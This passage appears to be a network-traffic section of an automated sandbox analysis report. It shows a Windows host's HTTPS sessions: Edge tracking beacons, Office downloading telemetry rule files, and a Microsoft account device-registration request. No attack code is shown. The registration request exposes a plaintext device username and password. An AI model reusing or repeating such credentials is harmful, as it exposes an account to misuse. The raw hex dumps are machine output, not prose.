Sd9PO<D3FEX,HPMfG,"5'*,H0>QfUP%o3TruoFguL~M]8&$m]V-,5C!Ic1h(OFewn\r(6jgP^oT0rmEuh<ky/
2024-11-11 09:33:22 UTC	1378	IN	Data Raw: 14 0d 73 e2 64 7e de 02 18 e4 0f c3 f4 76 5f 5c be dd ce 6f 88 69 ac e4 50 fa ee 07 ab c8 a0 8b 52 e9 bb 55 6b fa 9f c6 22 3c 29 b7 da 31 d5 9e ae 5a b0 94 e9 7c 5c e7 66 a1 94 56 e8 81 c0 57 d2 a5 5b 41 6a 0e 92 60 dd 9b c4 c3 77 12 c5 dc 29 96 c5 76 0c 56 10 bf 85 d3 7f df 78 05 8d e2 78 fc 2e d0 e2 68 c5 5e ba e2 78 a2 f7 ae 74 a2 c9 5d 23 c5 a1 dd 77 87 05 87 09 52 cb 31 68 27 3d 4b 9d 65 b2 de 77 fd b1 ff 96 4d 3f 5e 60 b9 1e 38 a4 9e c8 b0 ea d5 db 24 51 55 05 52 b6 f2 27 f0 e4 fd 6c 75 91 a7 7f 43 1e 77 ee c0 54 0b 56 cd 31 4f 5e ee ea 9b de 9a b3 38 11 b7 da d9 f9 e5 0f 50 4b 07 08 fd 45 55 f9 17 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6d 6e 2f 6d 65 Data Ascii: sd~v_\oiPRUk"<)1Z\|\fVW[Aj`w)vVxx.h^xt]#wR1h'=KewM?^`8$QUR'luCwTV1O^8PKEUPK!-_locales/mn/me

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49755	18.244.18.122	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:22 UTC	925	OUT	GET /b?rn=1731317601820&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=18874E57A98C67C518B55B63A89566FE&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:23 UTC	956	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Mon, 11 Nov 2024 09:33:22 GMT Location: /b2?rn=1731317601820&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=18874E57A98C67C518B55B63A89566FE&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=19F5b901c638ba8b0e63b9f1731317602; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=19F5b901c638ba8b0e63b9f1731317602; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 7daf545331a4f565a58e22b0fa952528.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-P11 X-Amz-Cf-Id: glOjvHfpLg0ohiJxeKSEAolHW_du42i2peU6cLySdBoswB-lX3qNKA==

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.5	49792	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:23 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: 2f59f113-901e-002a-1dd5-337a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093323Z-174f7845968c2t8dhC1EWR8s2000000004dg000000006sg9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:23 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.5	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:23 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 87508168-a01e-0098-0bd5-338556000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093323Z-174f7845968l4kp6hC1EWRe88400000004wg000000009yq5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:23 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.5	49791	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:23 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: 1958a6a9-101e-0046-5bd5-3391b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093323Z-174f7845968psccphC1EWRuz9s0000000530000000000r6w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:23 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.5	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:23 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: dc8e78b0-f01e-0085-35d5-3388ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093323Z-174f7845968jrjrxhC1EWRmmrs00000004tg000000008bw0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:23 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.5	49790	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:23 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 5f7101d7-901e-0048-4fd5-33b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093323Z-174f7845968psccphC1EWRuz9s00000004x0000000007yt2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:23 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49786	40.126.31.69	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	446	OUT	POST /ppsecure/deviceaddcredential.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 7642 Host: login.live.com
2024-11-11 09:33:23 UTC	7642	OUT	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 61 6b 72 70 78 66 69 66 71 71 73 79 7a 62 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 74 75 49 76 50 68 7e 23 29 44 65 24 74 64 6c 3b 28 30 44 47 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 6e 71 75 73 6b 66 70 70 70 63 69 76 63 3c 2f 4f 6c 64 4d Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02akrpxfifqqsyzb</Membername><Password>tuIvPh~#)De$tdl;(0DG</Password></Authentication><OldMembername>02vnquskfpppcivc</OldM
2024-11-11 09:33:28 UTC	542	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/xml Expires: Mon, 11 Nov 2024 09:32:23 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C542_BAY x-ms-request-id: 9b134e83-1792-4328-8ac0-fb597a7c77da PPServer: PPV: 30 H: PH1PEPF00018C06 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 11 Nov 2024 09:33:27 GMT Connection: close Content-Length: 17166
2024-11-11 09:33:28 UTC	15842	IN	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 30 30 31 31 34 45 42 38 30 42 45 46 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 32 66 38 65 61 61 33 65 2d 37 66 34 39 2d 34 61 66 31 2d 62 33 66 62 2d 61 65 39 39 33 64 65 39 66 62 35 35 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>001800114EB80BEF</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="2f8eaa3e-7f49-4af1-b3fb-ae993de9fb55" LicenseID="3252b20c-d425-4711
2024-11-11 09:33:28 UTC	1324	IN	Data Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66 Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49806	108.139.47.33	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	1012	OUT	GET /b2?rn=1731317601820&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=18874E57A98C67C518B55B63A89566FE&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=19F5b901c638ba8b0e63b9f1731317602; XID=19F5b901c638ba8b0e63b9f1731317602
2024-11-11 09:33:23 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Mon, 11 Nov 2024 09:33:23 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 005b0f8dc37e46fc9bdc40ea2ce8a602.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK50-P1 X-Amz-Cf-Id: eWY1_a1I8bXXbniW5wUlpRMcwguOtmJzsRqj-FyT13pgI9Y1TcML8Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.5	49798	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:23 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 33d00c7b-501e-007b-28d5-335ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093323Z-174f7845968swgbqhC1EWRmnb400000004z0000000001sqp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:23 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.5	49799	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:23 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 7eed3662-201e-003f-1ad5-336d94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093323Z-174f7845968psccphC1EWRuz9s00000004yg000000005fcs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:23 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
